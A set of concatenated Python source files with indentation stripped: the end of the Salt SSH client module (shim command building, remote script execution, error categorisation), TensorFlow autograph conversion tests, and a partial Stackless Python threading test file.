fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
opts_pkg = pre_wrapper["test.opts_pkg"]() # pylint: disable=E1102
if "_error" in opts_pkg:
# Refresh failed
retcode = opts_pkg["retcode"]
ret = salt.utils.json.dumps({"local": opts_pkg})
return ret, retcode
opts_pkg["file_roots"] = self.opts["file_roots"]
opts_pkg["pillar_roots"] = self.opts["pillar_roots"]
opts_pkg["ext_pillar"] = self.opts["ext_pillar"]
opts_pkg["extension_modules"] = self.opts["extension_modules"]
opts_pkg["module_dirs"] = self.opts["module_dirs"]
opts_pkg["_ssh_version"] = self.opts["_ssh_version"]
opts_pkg["__master_opts__"] = self.context["master_opts"]
if "known_hosts_file" in self.opts:
opts_pkg["known_hosts_file"] = self.opts["known_hosts_file"]
if "_caller_cachedir" in self.opts:
opts_pkg["_caller_cachedir"] = self.opts["_caller_cachedir"]
else:
opts_pkg["_caller_cachedir"] = self.opts["cachedir"]
# Use the ID defined in the roster file
opts_pkg["id"] = self.id
retcode = 0
# Restore master grains
for grain in conf_grains:
opts_pkg["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts_pkg["grains"][grain] = self.target["grains"][grain]
popts = {}
popts.update(opts_pkg["__master_opts__"])
popts.update(opts_pkg)
pillar = salt.pillar.Pillar(
popts,
opts_pkg["grains"],
opts_pkg["id"],
opts_pkg.get("saltenv", "base"),
)
pillar_data = pillar.compile_pillar()
# TODO: cache minion opts in datap in master.py
data = {
"opts": opts_pkg,
"grains": opts_pkg["grains"],
"pillar": pillar_data,
}
if data_cache:
with salt.utils.files.fopen(datap, "w+b") as fp_:
fp_.write(self.serial.dumps(data))
if not data and data_cache:
with salt.utils.files.fopen(datap, "rb") as fp_:
data = self.serial.load(fp_)
opts = data.get("opts", {})
opts["grains"] = data.get("grains")
# Restore master grains
for grain in conf_grains:
opts["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts["grains"][grain] = self.target["grains"][grain]
opts["pillar"] = data.get("pillar")
wrapper = salt.client.ssh.wrapper.FunctionWrapper(
opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
self.wfuncs = salt.loader.ssh_wrapper(opts, wrapper, self.context)
wrapper.wfuncs = self.wfuncs
# We're running in the mine, need to fetch the arguments from the
# roster, pillar, master config (in that order)
if self.mine:
mine_args = None
mine_fun_data = None
mine_fun = self.fun
if self.mine_functions and self.fun in self.mine_functions:
mine_fun_data = self.mine_functions[self.fun]
elif opts["pillar"] and self.fun in opts["pillar"].get(
"mine_functions", {}
):
mine_fun_data = opts["pillar"]["mine_functions"][self.fun]
elif self.fun in self.context["master_opts"].get("mine_functions", {}):
mine_fun_data = self.context["master_opts"]["mine_functions"][self.fun]
if isinstance(mine_fun_data, dict):
mine_fun = mine_fun_data.pop("mine_function", mine_fun)
mine_args = mine_fun_data
elif isinstance(mine_fun_data, list):
for item in mine_fun_data[:]:
if isinstance(item, dict) and "mine_function" in item:
mine_fun = item["mine_function"]
mine_fun_data.pop(mine_fun_data.index(item))
mine_args = mine_fun_data
else:
mine_args = mine_fun_data
# If we found mine_args, replace our command's args
if isinstance(mine_args, dict):
self.args = []
self.kwargs = mine_args
elif isinstance(mine_args, list):
self.args = mine_args
self.kwargs = {}
try:
if self.mine:
result = wrapper[mine_fun](*self.args, **self.kwargs)
else:
result = self.wfuncs[self.fun](*self.args, **self.kwargs)
except TypeError as exc:
result = "TypeError encountered executing {}: {}".format(self.fun, exc)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
except Exception as exc: # pylint: disable=broad-except
result = "An Exception occurred while executing {}: {}".format(
self.fun, exc
)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
# Mimic the json data-structure that "salt-call --local" will
# emit (as seen in ssh_py_shim.py)
if isinstance(result, dict) and "local" in result:
ret = salt.utils.json.dumps({"local": result["local"]})
else:
ret = salt.utils.json.dumps({"local": {"return": result}})
return ret, retcode
def _cmd_str(self):
"""
Prepare the command string
"""
sudo = "sudo" if self.target["sudo"] else ""
sudo_user = self.target["sudo_user"]
if "_caller_cachedir" in self.opts:
cachedir = self.opts["_caller_cachedir"]
else:
cachedir = self.opts["cachedir"]
thin_code_digest, thin_sum = salt.utils.thin.thin_sum(cachedir, "sha1")
debug = ""
if not self.opts.get("log_level"):
self.opts["log_level"] = "info"
if (
salt.log.LOG_LEVELS["debug"]
>= salt.log.LOG_LEVELS[self.opts.get("log_level", "info")]
):
debug = "1"
arg_str = '''
OPTIONS.config = \
"""
{config}
"""
OPTIONS.delimiter = '{delimeter}'
OPTIONS.saltdir = '{saltdir}'
OPTIONS.checksum = '{checksum}'
OPTIONS.hashfunc = '{hashfunc}'
OPTIONS.version = '{version}'
OPTIONS.ext_mods = '{ext_mods}'
OPTIONS.wipe = {wipe}
OPTIONS.tty = {tty}
OPTIONS.cmd_umask = {cmd_umask}
OPTIONS.code_checksum = {code_checksum}
ARGS = {arguments}\n'''.format(
config=self.minion_config,
delimeter=RSTR,
saltdir=self.thin_dir,
checksum=thin_sum,
hashfunc="sha1",
version=salt.version.__version__,
ext_mods=self.mods.get("version", ""),
wipe=self.wipe,
tty=self.tty,
cmd_umask=self.cmd_umask,
code_checksum=thin_code_digest,
arguments=self.argv,
)
py_code = SSH_PY_SHIM.replace("#%%OPTS", arg_str)
py_code_enc = base64.encodebytes(py_code.encode("utf-8")).decode("utf-8")
if not self.winrm:
cmd = SSH_SH_SHIM.format(
DEBUG=debug,
SUDO=sudo,
SUDO_USER=sudo_user,
SSH_PY_CODE=py_code_enc,
HOST_PY_MAJOR=sys.version_info[0],
SET_PATH=self.set_path,
)
else:
cmd = saltwinshell.gen_shim(py_code_enc)
return cmd
def execute_script(self, script, extension="py", pre_dir=""):
"""
execute a script on the minion then delete
"""
if extension == "ps1":
ret = self.shell.exec_cmd('"powershell {}"'.format(script))
else:
if not self.winrm:
ret = self.shell.exec_cmd("/bin/sh '{}{}'".format(pre_dir, script))
else:
ret = saltwinshell.call_python(self, script)
# Remove file from target system
if not self.winrm:
self.shell.exec_cmd("rm '{}{}'".format(pre_dir, script))
else:
self.shell.exec_cmd("del {}".format(script))
return ret
def shim_cmd(self, cmd_str, extension="py"):
"""
Run a shim command.
If tty is enabled, we must scp the shim to the target system and
execute it there
"""
if not self.tty and not self.winrm:
return self.shell.exec_cmd(cmd_str)
# Write the shim to a temporary file in the default temp directory
with tempfile.NamedTemporaryFile(
mode="w+b", prefix="shim_", delete=False
) as shim_tmp_file:
shim_tmp_file.write(salt.utils.stringutils.to_bytes(cmd_str))
# Copy shim to target system, under $HOME/.<randomized name>
target_shim_file = ".{}.{}".format(
binascii.hexlify(os.urandom(6)).decode("ascii"), extension
)
if self.winrm:
target_shim_file = saltwinshell.get_target_shim_file(self, target_shim_file)
self.shell.send(shim_tmp_file.name, target_shim_file, makedirs=True)
# Remove our shim file
try:
os.remove(shim_tmp_file.name)
except OSError:
pass
ret = self.execute_script(
script=target_shim_file, extension=extension, pre_dir="$HOME/"
)
return ret
def cmd_block(self, is_retry=False):
"""
Prepare the pre-check command to send to the subsystem
1. execute SHIM + command
2. check if SHIM returns a master request or if it completed
3. handle any master request
4. re-execute SHIM + command
5. split SHIM results from command results
6. return command results
"""
self.argv = _convert_args(self.argv)
log.debug(
"Performing shimmed, blocking command as follows:\n%s",
" ".join([str(arg) for arg in self.argv]),
)
cmd_str = self._cmd_str()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
log.trace("STDOUT %s\n%s", self.target["host"], stdout)
log.trace("STDERR %s\n%s", self.target["host"], stderr)
log.debug("RETCODE %s: %s", self.target["host"], retcode)
error = self.categorize_shim_errors(stdout, stderr, retcode)
if error:
if error == "Python environment not found on Windows system":
saltwinshell.deploy_python(self)
stdout, stderr, retcode = self.shim_cmd(cmd_str)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif error == "Undefined SHIM state":
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying thin, undefined state: {}".format(
stdout
),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
return "ERROR: {}".format(error), stderr, retcode
# FIXME: this discards output from ssh_shim if the shim succeeds. It should
# always save the shim output regardless of shim success or failure.
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if re.search(RSTR_RE, stderr):
# Found RSTR in stderr which means SHIM completed and only
# and remaining output is only from salt.
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
# RSTR was found in stdout but not stderr - which means there
# is a SHIM command for the master.
shim_command = re.split(r"\r?\n", stdout, 1)[0].strip()
log.debug("SHIM retcode(%s) and command: %s", retcode, shim_command)
if (
"deploy" == shim_command
and retcode == salt.defaults.exitcodes.EX_THIN_DEPLOY
):
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
if not self.tty:
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
return self.cmd_block()
elif not re.search(RSTR_RE, stdout):
# If RSTR is not seen in stdout with tty, then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if self.tty:
stderr = ""
else:
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif "ext_mods" == shim_command:
self.deploy_ext()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying ext_mods: {}".format(stdout),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
return stdout, stderr, retcode
def categorize_shim_errors(self, stdout_bytes, stderr_bytes, retcode):
stdout = salt.utils.stringutils.to_unicode(stdout_bytes)
stderr = salt.utils.stringutils.to_unicode(stderr_bytes)
if re.search(RSTR_RE, stdout) and stdout != RSTR + "\n":
# RSTR was found in stdout which means that the shim
# functioned without *errors* . . . but there may be shim
# commands, unless the only thing we found is RSTR
return None
if re.search(RSTR_RE, stderr):
# Undefined state
return "Undefined SHIM state"
if stderr.startswith("Permission denied"):
# SHIM was not even reached
return None
perm_error_fmt = (
"Permissions problem, target user may need " "to be root or use sudo:\n {0}"
)
def _version_mismatch_error():
messages = {
2: {
6: "Install Python 2.7 / Python 3 Salt dependencies on the Salt SSH master \n"
"to interact with Python 2.7 / Python 3 targets",
7: "Install Python 2.6 / Python 3 Salt dependencies on the Salt SSH master \n"
"to interact with Python 2.6 / Python 3 targets",
},
3: {
"default": "- Install Python 2.6/2.7 Salt dependencies on the Salt SSH \n"
" master to interact with Python 2.6/2.7 targets\n"
"- Install Python 3 on the target machine(s)",
},
"default": "Matching major/minor Python release (>=2.6) needed both on the Salt SSH \n"
"master and target machine",
}
major, minor = sys.version_info[:2]
help_msg = (
messages.get(major, {}).get(minor)
or messages.get(major, {}).get("default")
or messages["default"]
)
return "Python version error. Recommendation(s) follow:\n" + help_msg
errors = [
(
(),
"sudo: no tty present and no askpass program specified",
"sudo expected a password, NOPASSWD required",
),
(
(salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,),
"Python interpreter is too old",
_version_mismatch_error(),
),
(
(salt.defaults.exitcodes.EX_THIN_CHECKSUM,),
"checksum mismatched",
"The salt thin transfer was corrupted",
),
(
(salt.defaults.exitcodes.EX_SCP_NOT_FOUND,),
"scp not found",
"No scp binary. openssh-clients package required",
),
(
(salt.defaults.exitcodes.EX_CANTCREAT,),
"salt path .* exists but is not a directory",
"A necessary path for salt thin unexpectedly exists:\n " + stderr,
),
(
(),
"sudo: sorry, you must have a tty to run sudo",
"sudo is configured with requiretty",
),
((), "Failed to open log file", perm_error_fmt.format(stderr)),
((), "Permission denied:.*/salt", perm_error_fmt.format(stderr)),
(
(),
"Failed to create directory path.*/salt",
perm_error_fmt.format(stderr),
),
(
(salt.defaults.exitcodes.EX_SOFTWARE,),
"exists but is not",
"An internal error occurred with the shim, please investigate:\n "
+ stderr,
),
(
(),
"The system cannot find the path specified",
"Python environment not found on Windows system",
),
(
(),
"is not recognized",
"Python environment not found on Windows system",
),
]
for error in errors:
if retcode in error[0] or re.search(error[1], stderr):
return error[2]
return None
def check_refresh(self, data, ret):
"""
Stub out check_refresh
"""
return
def module_refresh(self):
"""
Module refresh is not needed, stub it out
"""
return
def lowstate_file_refs(chunks):
"""
Create a list of file ref objects to reconcile
"""
refs = {}
for chunk in chunks:
saltenv = "base"
crefs = []
for state in chunk:
if state == "__env__":
saltenv = chunk[state]
elif state == "saltenv":
saltenv = chunk[state]
elif state.startswith("__"):
continue
crefs.extend(salt_refs(chunk[state]))
if crefs:
if saltenv not in refs:
refs[saltenv] = []
refs[saltenv].append(crefs)
return refs
def salt_refs(data):
"""
Pull salt file references out of the states
"""
proto = "salt://"
ret = []
if isinstance(data, str):
if data.startswith(proto):
return [data]
if isinstance(data, list):
for comp in data:
if isinstance(comp, str):
if comp.startswith(proto):
ret.append(comp)
return ret
def mod_data(fsclient):
"""
Generate the module arguments for the shim data
"""
# TODO, change out for a fileserver backend
sync_refs = [
"modules",
"states",
"grains",
"renderers",
"returners",
]
ret = {}
envs = fsclient.envs()
ver_base = ""
for env in envs:
files = fsclient.file_list(env)
for ref in sync_refs:
mods_data = {}
pref = "_{}".format(ref)
for fn_ in sorted(files):
if fn_.startswith(pref):
if fn_.endswith((".py", ".so", ".pyx")):
full = salt.utils.url.create(fn_)
mod_path = fsclient.cache_file(full, env)
if not os.path.isfile(mod_path):
continue
mods_data[os.path.basename(fn_)] = mod_path
chunk = salt.utils.hashutils.get_hash(mod_path)
ver_base += chunk
if mods_data:
if ref in ret:
ret[ref].update(mods_data)
else:
ret[ref] = mods_data
if not ret:
return {}
ver_base = salt.utils.stringutils.to_bytes(ver_base)
ver = hashlib.sha1(ver_base).hexdigest()
ext_tar_path = os.path.join(
fsclient.opts["cachedir"], "ext_mods.{}.tgz".format(ver)
)
mods = {"version": ver, "file": ext_tar_path}
if os.path.isfile(ext_tar_path):
return mods
tfp = tarfile.open(ext_tar_path, "w:gz")
verfile = os.path.join(fsclient.opts["cachedir"], "ext_mods.ver")
with salt.utils.files.fopen(verfile, "w+") as fp_:
fp_.write(ver)
tfp.add(verfile, "ext_version")
for ref in ret:
for fn_ in ret[ref]:
tfp.add(ret[ref][fn_], os.path.join(ref, fn_))
tfp.close()
return mods
def ssh_version():
"""
Returns the version of the installed ssh command
"""
# This function needs more granular checks and to be validated against
# older versions of ssh
ret = subprocess.Popen(
["ssh", "-V"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
).communicate()
try:
version_parts = ret[1].split(b",")[0].split(b"_")[1]
parts = []
for part in version_parts:
try:
parts.append(int(part))
except ValueError:
return tuple(parts)
return tuple(parts)
except IndexError:
return (2, 0)
def _convert_args(args):
"""
Take a list of args, and convert any dicts inside the list to keyword
args in the form of `key=value`, ready to be passed to salt-ssh
"""
converted = []
for arg in args:
if isinstance(arg, dict):
for key in list(arg.keys()):
if key == "__kwarg__":
continue
converted.append("{}={}".format(key, arg[key]))
else:
converted.append(arg)
return converted
|
conversion_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for conversion module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import imp
import sys
import threading
import types
import weakref
import gast
import six
from tensorflow.python.autograph import utils
from tensorflow.python.autograph.core import config
from tensorflow.python.autograph.core import converter
from tensorflow.python.autograph.impl import api
from tensorflow.python.autograph.impl import conversion
from tensorflow.python.autograph.impl.testing import pybind_for_testing
from tensorflow.python.autograph.pyct import parser
from tensorflow.python.eager import function
from tensorflow.python.framework import constant_op
from tensorflow.python.keras.engine import training
from tensorflow.python.platform import test
class ConversionTest(test.TestCase):
def _simple_program_ctx(self):
return converter.ProgramContext(
options=converter.ConversionOptions(recursive=True),
autograph_module=api)
def test_is_whitelisted(self):
def test_fn():
return constant_op.constant(1)
self.assertFalse(conversion.is_whitelisted(test_fn))
self.assertTrue(conversion.is_whitelisted(utils))
self.assertTrue(conversion.is_whitelisted(constant_op.constant))
def test_is_whitelisted_tensorflow_like(self):
tf_like = imp.new_module('tensorflow_foo')
def test_fn():
pass
tf_like.test_fn = test_fn
test_fn.__module__ = tf_like
self.assertFalse(conversion.is_whitelisted(tf_like.test_fn))
def test_is_whitelisted_callable_whitelisted_call(self):
whitelisted_mod = imp.new_module('test_whitelisted_call')
sys.modules['test_whitelisted_call'] = whitelisted_mod
config.CONVERSION_RULES = ((config.DoNotConvert('test_whitelisted_call'),) +
config.CONVERSION_RULES)
class TestClass(object):
def __call__(self):
pass
def whitelisted_method(self):
pass
TestClass.__module__ = 'test_whitelisted_call'
if six.PY2:
TestClass.__call__.__func__.__module__ = 'test_whitelisted_call'
else:
TestClass.__call__.__module__ = 'test_whitelisted_call'
class Subclass(TestClass):
def converted_method(self):
pass
tc = Subclass()
self.assertTrue(conversion.is_whitelisted(TestClass.__call__))
self.assertTrue(conversion.is_whitelisted(tc))
self.assertTrue(conversion.is_whitelisted(tc.__call__))
self.assertTrue(conversion.is_whitelisted(tc.whitelisted_method))
self.assertFalse(conversion.is_whitelisted(Subclass))
self.assertFalse(conversion.is_whitelisted(tc.converted_method))
def test_is_whitelisted_tfmethodwrapper(self):
class TestClass(object):
def member_function(self):
pass
TestClass.__module__ = 'test_whitelisted_call'
test_obj = TestClass()
def test_fn(self):
del self
bound_method = types.MethodType(
test_fn,
function.TfMethodTarget(
weakref.ref(test_obj), test_obj.member_function))
self.assertTrue(conversion.is_whitelisted(bound_method))
def test_is_whitelisted_pybind(self):
test_object = pybind_for_testing.TestClassDef()
with test.mock.patch.object(config, 'CONVERSION_RULES', ()):
# TODO(mdan): This should return True for functions and methods.
# Note: currently, native bindings are whitelisted by a separate check.
self.assertFalse(conversion.is_whitelisted(test_object.method))
def test_convert_entity_to_ast_unsupported_types(self):
with self.assertRaises(NotImplementedError):
program_ctx = self._simple_program_ctx()
conversion.convert_entity_to_ast('dummy', program_ctx)
def test_convert_entity_to_ast_callable(self):
b = 2
def f(a):
return a + b
program_ctx = self._simple_program_ctx()
nodes, name, info = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertIs(info.namespace['b'], b)
def test_convert_entity_to_ast_function_with_defaults(self):
b = 2
c = 1
def f(a, d=c + 1):
return a + b + d
program_ctx = self._simple_program_ctx()
nodes, name, _ = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertEqual(
parser.unparse(fn_node.args.defaults[0],
include_encoding_marker=False).strip(), 'None')
def test_convert_entity_to_ast_call_tree(self):
def g(a):
return a
def f(a):
return g(a)
program_ctx = self._simple_program_ctx()
nodes, _, _ = conversion.convert_entity_to_ast(f, program_ctx)
f_node, = nodes
self.assertEqual('tf__f', f_node.name)
def test_convert_entity_to_ast_class_hierarchy(self):
class TestBase(object):
def __init__(self, x='base'):
self.x = x
def foo(self):
return self.x
def bar(self):
return self.x
class TestSubclass(TestBase):
def __init__(self, y):
super(TestSubclass, self).__init__('sub')
self.y = y
def foo(self):
return self.y
def baz(self):
return self.y
program_ctx = self._simple_program_ctx()
with self.assertRaisesRegex(NotImplementedError, 'classes.*whitelisted'):
conversion.convert_entity_to_ast(TestSubclass, program_ctx)
def test_convert_entity_to_ast_class_hierarchy_whitelisted(self):
class TestSubclass(training.Model):
def __init__(self, y):
super(TestSubclass, self).__init__()
self.built = False
def call(self, x):
return 3 * x
program_ctx = self._simple_program_ctx()
(import_node, class_node), name, _ = conversion.convert_entity_to_ast(
TestSubclass, program_ctx)
self.assertEqual(import_node.names[0].name, 'Model')
self.assertEqual(name, 'TfTestSubclass')
self.assertEqual(class_node.name, 'TfTestSubclass')
def test_convert_entity_to_ast_lambda(self):
b = 2
f = lambda x: b * x if x > 0 else -x
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['b'], b)
def test_convert_entity_to_ast_multiple_lambdas(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda y: b * y)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['a'], a)
def test_convert_entity_to_ast_multiple_lambdas_ambiguous_definitions(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda x: b * x)
program_ctx = self._simple_program_ctx()
with self.assertRaises(ValueError):
conversion.convert_entity_to_ast(f, program_ctx)
def test_convert_entity_to_ast_lambda_code_with_garbage(self):
# pylint:disable=g-long-lambda
f = ( # intentional wrap
lambda x: (
x # intentional wrap
+ 1),)[0]
# pylint:enable=g-long-lambda
program_ctx = self._simple_program_ctx()
(fn_node,), name, _ = conversion.convert_entity_to_ast(f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
def test_convert_entity_to_ast_nested_functions(self):
b = 2
def f(x):
def g(x):
return b * x
return g(x)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual(fn_node.name, 'tf__f')
self.assertEqual('tf__f', name)
self.assertIs(entity_info.namespace['b'], b)
def test_convert_concurrency(self):
def test_fn():
pass
generated_file_names = []
def conversion_thread():
new_f = conversion.convert(test_fn, self._simple_program_ctx())
generated_file_names.append(new_f.__code__.co_filename)
threads = tuple(
threading.Thread(target=conversion_thread) for _ in range(10))
for t in threads:
t.start()
for t in threads:
t.join()
# Races would potentially create multiple files (non-deterministically,
# but with high likelihood).
self.assertEqual(len(set(generated_file_names)), 1)
def test_convert_reentrance(self):
def test_fn():
pass
# There are no known ways to cause convert to re-enter. So we instrument
# an internal function to do that instead.
old_node_to_graph = conversion.node_to_graph
self.num_conversions = 0
def node_to_graph_wrapper(node, context):
self.num_conversions += 1
if self.num_conversions < 2:
conversion.convert(test_fn, self._simple_program_ctx())
return old_node_to_graph(node, context)
try:
conversion.node_to_graph = node_to_graph_wrapper
new_f = conversion.convert(test_fn, self._simple_program_ctx())
self.assertIsNotNone(new_f)
finally:
conversion.node_to_graph = old_node_to_graph
if __name__ == '__main__':
test.main()
|
test_thread.py
|
from __future__ import absolute_import
# import common
import unittest
import stackless
import sys
import time
import struct
import _teststackless
from _stackless import _test_nostacklesscall as apply_not_stackless
from support import test_main # @UnusedImport
from support import StacklessTestCase, AsTaskletTestCase, testcase_leaks_references
try:
import threading
try:
import thread
except ImportError:
import _thread as thread
withThreads = True
except:
withThreads = False
class threading(object):
Thread = object
class SkipMixin(object):
def skipUnlessSoftswitching(self):
if not stackless.enable_softswitch(None):
self.skipTest("test requires softswitching")
def GetRemoteTasklets(callables):
"""Get a non-scheduled tasklet on a remote thread"""
c = stackless.channel()
def tfunc():
# thread func. Create a tasklet, remove it, and send it to the master.
# then wait for the tasklet to finish.
try:
c2 = stackless.channel()
tasklets = []
for callable in callables:
def helper(callable):
try:
callable()
except:
c2.send_throw(*sys.exc_info())
else:
c2.send(None)
t = stackless.tasklet(helper)(callable)
t.remove()
tasklets.append(t)
c.send(tasklets)
except:
c.send_throw(*sys.exc_info())
stackless.__reduce__()
for callable in callables:
c2.receive()
stackless.run() # drain the scheduler
thread = threading.Thread(target=tfunc)
thread.start()
d = c.receive(), thread
return d
class LingeringThread(threading.Thread):
""" A thread that lingers on after executing its main function"""
def __init__(self, *args, **kwargs):
self.real_target = kwargs["target"]
kwargs["target"] = self.thread_func
super(LingeringThread, self).__init__(*args, **kwargs)
self.shutdown = threading.Event()
def thread_func(self, *args, **kwargs):
result = self.real_target(*args, **kwargs)
self.linger()
return result
def linger(self):
# wait until join is called
self.shutdown.wait()
def join(self):
self.shutdown.set()
super(LingeringThread, self).join()
time.sleep(0.01) # give the thread a chance to clean up
def __enter__(self):
pass
def __exit__(self, ex, val, tb):
self.join()
class SchedulingThread(LingeringThread):
""" A thread that runs a scheduling loop after executing its main function"""
def linger(self):
while not self.shutdown.is_set():
stackless.run()
time.sleep(0.001)
def GetRemoteTasklet(callable, args):
"""Get a non-scheduled tasklet on a remote thread"""
tasklets, thread = GetRemoteTasklets([lambda:callable(*args)])
return tasklets[0], thread
@unittest.skipUnless(withThreads, "requires thread support")
class TestRemoteSchedule(AsTaskletTestCase):
def setUp(self):
super(TestRemoteSchedule, self).setUp()
self.events = []
def testFoo(self):
def foo():
pass
t, thread = GetRemoteTasklet(foo, ())
try:
t.run()
finally:
thread.join(2)
def testRun(self):
def foo():
self.events.append(0)
t, thread = GetRemoteTasklet(foo, ())
try:
t.run()
finally:
thread.join(2)
self.assertEqual(self.events, list(range(len(self.events))))
def testInsert(self):
def foo():
self.events.append(0)
t, thread = GetRemoteTasklet(foo, ())
try:
t.insert()
finally:
thread.join(2)
self.assertEqual(self.events, list(range(len(self.events))))
def testRunOrder(self):
def a():
self.events.append(0)
def b():
self.events.append(1)
def c():
self.events.append(2)
(t1, t2, t3), thread = GetRemoteTasklets((a, b, c))
try:
with stackless.atomic():
t2.insert()
t3.insert()
t1.run() # t1 should run first
finally:
thread.join(2)
self.assertEqual(self.events, list(range(3)))
@unittest.skipUnless(withThreads, "requires thread support")
class TestRebindCrash(SkipMixin, StacklessTestCase):
"""A crash from Anselm Kruis, occurring when transferring tasklet to a thread"""
def create_remote_tasklet(self, nontrivial=False, job=None):
result = []
e1 = threading.Event()
e2 = threading.Event()
def remove():
stackless.schedule_remove(retval=None)
def taskletfunc():
result.append(stackless.getcurrent())
if nontrivial:
_teststackless.test_cstate(remove)
else:
remove()
if job:
job()
def threadfunc():
t = stackless.tasklet(taskletfunc)()
t.run()
e1.set()
while not e2.is_set():
stackless.run()
time.sleep(0.001)
e2.wait() # wait until we can die
t = threading.Thread(target=threadfunc)
t.start()
e1.wait()
# callable to end the thread
def end():
e2.set()
t.join()
return end, result[0]
def to_current_thread(self, task):
"""
Get a tasklet for the current thread.
If the tasklet already belongs to the current thread, this
method returns the tasklet unmodified.
Otherwise, this method tries to
unbind the tasklet and returns a newly created tasklet. If
unbinding fails, the method raises :exc:`RuntimeError`.
"""
self.skipUnlessSoftswitching()
if task.thread_id == thread.get_ident():
return task
reducedTask = task.__reduce__()
# raise RuntimeError, if task is alive but not paused
task.bind(None)
if False: # Stackless will crash if set to False
frameList = reducedTask[2][3]
for i in range(len(frameList)):
frame = frameList[i]
if isinstance(frame, stackless.cframe):
reducedFrame = frame.__reduce__()
newFrame = reducedFrame[0](*reducedFrame[1])
newFrame.__setstate__(reducedFrame[2])
frameList[i] = newFrame
# rebind the task
task = reducedTask[0](*reducedTask[1])
for i in range(len(reducedTask[2][3])):
if not isinstance(reducedTask[2][3][i], stackless.cframe):
reducedTask[2][3][i] = reducedTask[2][3][i].frame
task.__setstate__(reducedTask[2])
return task
def test_crash(self):
self.skipUnlessSoftswitching()
end, task = self.create_remote_tasklet()
try:
task = self.to_current_thread(task)
task.run()
finally:
end()
def test_no_rebind(self):
result = []
e = threading.Event()
def job():
result.append(thread.get_ident())
e.set()
end, task = self.create_remote_tasklet(job=job)
try:
task.run()
e.wait()
self.assertNotEqual(result[0], thread.get_ident())
finally:
end()
def test_rebind(self):
self.skipUnlessSoftswitching()
result = []
def job():
result.append(thread.get_ident())
end, task = self.create_remote_tasklet(job=job)
try:
task.bind_thread()
task.run()
self.assertEqual(result[0], thread.get_ident())
finally:
end()
def test_rebind_nontrivial(self):
end, task = self.create_remote_tasklet(nontrivial=True)
try:
self.assertRaisesRegex(RuntimeError, "C state", task.bind_thread)
finally:
end()
@unittest.skipUnless(withThreads, "requires thread support")
